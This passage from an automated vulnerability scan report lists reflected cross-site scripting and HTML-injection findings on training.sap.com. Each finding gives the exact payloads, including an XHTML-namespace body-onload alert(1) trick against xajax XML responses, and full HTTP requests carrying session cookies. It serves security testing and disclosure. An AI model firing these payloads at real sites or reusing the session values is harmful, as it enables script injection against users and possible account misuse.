Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd

xajax=registerUser&xajaxr=1321211708182

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:13:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; expires=Mon, 12-Nov-2012 19:13:55 GMT; path=/; domain=.sap.com; httponly
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; expires=Tue, 12-Nov-2013 19:13:55 GMT; path=/; domain=.sap.com; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Set-Cookie: UsersDefaultCountry=US; expires=Tue, 13-Dec-2011 19:13:56 GMT; path=/; domain=.sap.com
Set-Cookie: UsersDefaultLanguage=EN; expires=Tue, 13-Dec-2011 19:13:56 GMT; path=/; domain=.sap.com
Content-Length: 164
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8" ?><xjx><cmd n="js"><![CDATA[document.location.href='/us/en/en8748c<a>22aed8f2a61/training-locations?noredirect';]]></cmd></xjx>

1.52. https://training.sap.com/us/en/training-locations/ [xajax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://training.sap.com
Path:   /us/en/training-locations/

Issue detail

The value of the xajax request parameter is copied into the XML document as plain text between tags. The payload 77c98<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>625c56dcaf was submitted in the xajax parameter. This input was echoed as 77c98<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>625c56dcaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

POST /us/en/training-locations/?noredirect HTTP/1.1
Host: training.sap.com
Connection: keep-alive
Content-Length: 39
Origin: https://training.sap.com
Method: POST https://training.sap.com/us/en/training-locations/?noredirect HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://training.sap.com/us/en/training-locations/?noredirect
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd

xajax=registerUser77c98<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>625c56dcaf&xajaxr=1321211708182

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:13:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; expires=Mon, 12-Nov-2012 19:13:45 GMT; path=/; domain=.sap.com; httponly
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; expires=Tue, 12-Nov-2013 19:13:45 GMT; path=/; domain=.sap.com; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Content-Length: 198
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/xml; charset="utf-8"

<?xml version="1.0" encoding="utf-8" ?><xjx><cmd n="al"><![CDATA[Unknown Function registerUser77c98<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>625c56dcaf.]]></cmd></xjx>

1.53. https://training.sap.com/us/en/training-locations/us/atlanta,-ga-(kdc [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://training.sap.com
Path:   /us/en/training-locations/us/atlanta,-ga-(kdc

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 623de"><a>ae987527070 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /us/en/training-locations/us623de"><a>ae987527070/atlanta,-ga-(kdc HTTP/1.1
Host: training.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:08:20 GMT
Server: Apache
Set-Cookie: ecomssid=vqfv91ikhjeot6hs582hd8sbu1; path=/; domain=.sap.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; expires=Mon, 12-Nov-2012 19:08:20 GMT; path=/; domain=.sap.com; httponly
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; expires=Tue, 12-Nov-2013 19:08:20 GMT; path=/; domain=.sap.com; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="content-t
...[SNIP]...
<a href="/us/en/training-locations/us623de"><a>ae987527070">
...[SNIP]...

1.54. https://training.sap.com/us/en/training-locations/us/atlanta,-ga-(kdc) [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://training.sap.com
Path:   /us/en/training-locations/us/atlanta,-ga-(kdc)

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d67f9"><a>2515664171f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /us/en/training-locations/usd67f9"><a>2515664171f/atlanta,-ga-(kdc) HTTP/1.1
Host: training.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:08:18 GMT
Server: Apache
Set-Cookie: ecomssid=45t28p4giv24ge2vn4rp4vka21; path=/; domain=.sap.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ecomguid=907f2ec4-0d70-3404-1d02-0f82ebb065a9; expires=Mon, 12-Nov-2012 19:08:18 GMT; path=/; domain=.sap.com; httponly
Set-Cookie: client=cba8a5a2-c5ca-2594-d150-d62d33d9bbe8; expires=Tue, 12-Nov-2013 19:08:18 GMT; path=/; domain=.sap.com; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="content-t
...[SNIP]...
<a href="/us/en/training-locations/usd67f9"><a>2515664171f">
...[SNIP]...

1.55. https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://training.sap.com
Path:   /us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47afa<a>61129945a2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /us47afa<a>61129945a2a/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc HTTP/1.1
Host: training.sap.com
Connection: keep-alive
Content-Length: 55
Origin: https://training.sap.com
Method: POST https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; UsersDefaultCountry=US; UsersDefaultLanguage=EN

xajax=receiveSapToken&xajaxr=1321211687686&xajaxargs[]=

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:13:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; expires=Mon, 12-Nov-2012 19:13:19 GMT; path=/; domain=.sap.com; httponly
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; expires=Tue, 12-Nov-2013 19:13:19 GMT; path=/; domain=.sap.com; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Set-Cookie: UsersDefaultCountry=US; expires=Tue, 13-Dec-2011 19:13:19 GMT; path=/; domain=.sap.com
Set-Cookie: UsersDefaultLanguage=EN; expires=Tue, 13-Dec-2011 19:13:19 GMT; path=/; domain=.sap.com
Content-Length: 202
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8" ?><xjx><cmd n="js"><![CDATA[document.location.href='/us/en/us47afa<a>61129945a2a/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc';]]></cmd></xj
...[SNIP]...

1.56. https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://training.sap.com
Path:   /us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d96f<a>5dd35e8c69e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /us/en5d96f<a>5dd35e8c69e/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc HTTP/1.1
Host: training.sap.com
Connection: keep-alive
Content-Length: 55
Origin: https://training.sap.com
Method: POST https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; UsersDefaultCountry=US; UsersDefaultLanguage=EN

xajax=receiveSapToken&xajaxr=1321211687686&xajaxargs[]=

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:13:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; expires=Mon, 12-Nov-2012 19:13:26 GMT; path=/; domain=.sap.com; httponly
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; expires=Tue, 12-Nov-2013 19:13:26 GMT; path=/; domain=.sap.com; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Set-Cookie: UsersDefaultCountry=US; expires=Tue, 13-Dec-2011 19:13:26 GMT; path=/; domain=.sap.com
Set-Cookie: UsersDefaultLanguage=EN; expires=Tue, 13-Dec-2011 19:13:26 GMT; path=/; domain=.sap.com
Content-Length: 202
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8" ?><xjx><cmd n="js"><![CDATA[document.location.href='/us/en/en5d96f<a>5dd35e8c69e/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc';]]></cmd></xj
...[SNIP]...

1.57. https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://training.sap.com
Path:   /us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 624e6"><a>823d4593e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /us/en/training-locations/624e6"><a>823d4593e/atlanta,-ga-(kdc HTTP/1.1
Host: training.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; ecomssid=vqfv91ikhjeot6hs582hd8sbu1; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:13:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; expires=Mon, 12-Nov-2012 19:13:02 GMT; path=/; domain=.sap.com; httponly
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; expires=Tue, 12-Nov-2013 19:13:02 GMT; path=/; domain=.sap.com; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="content-t
...[SNIP]...
<a href="/us/en/training-locations/624e6"><a>823d4593e">
...[SNIP]...

1.58. https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc [xajax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://training.sap.com
Path:   /us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc

Issue detail

The value of the xajax request parameter is copied into the XML document as plain text between tags. The payload b382f<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>85060c32798 was submitted in the xajax parameter. This input was echoed as b382f<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>85060c32798 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

POST /us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc HTTP/1.1
Host: training.sap.com
Connection: keep-alive
Content-Length: 55
Origin: https://training.sap.com
Method: POST https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; UsersDefaultCountry=US; UsersDefaultLanguage=EN

xajax=receiveSapTokenb382f<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>85060c32798&xajaxr=1321211687686&xajaxargs[]=

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:13:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; expires=Mon, 12-Nov-2012 19:13:15 GMT; path=/; domain=.sap.com; httponly
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; expires=Tue, 12-Nov-2013 19:13:15 GMT; path=/; domain=.sap.com; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Content-Length: 202
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/xml; charset="utf-8"

<?xml version="1.0" encoding="utf-8" ?><xjx><cmd n="al"><![CDATA[Unknown Function receiveSapTokenb382f<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>85060c32798.]]></cmd></xj
...[SNIP]...

1.59. https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/images/content/pod_jumpstart.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://training.sap.com
Path:   /us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/images/content/pod_jumpstart.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30461"><a>e5b6240e46c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /us/en/training-locations/us623de%22%3E%3Ca%3Eae98752707030461"><a>e5b6240e46c/images/content/pod_jumpstart.jpg HTTP/1.1
Host: training.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://training.sap.com/us/en/training-locations/us623de%22%3E%3Ca%3Eae987527070/atlanta,-ga-(kdc
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
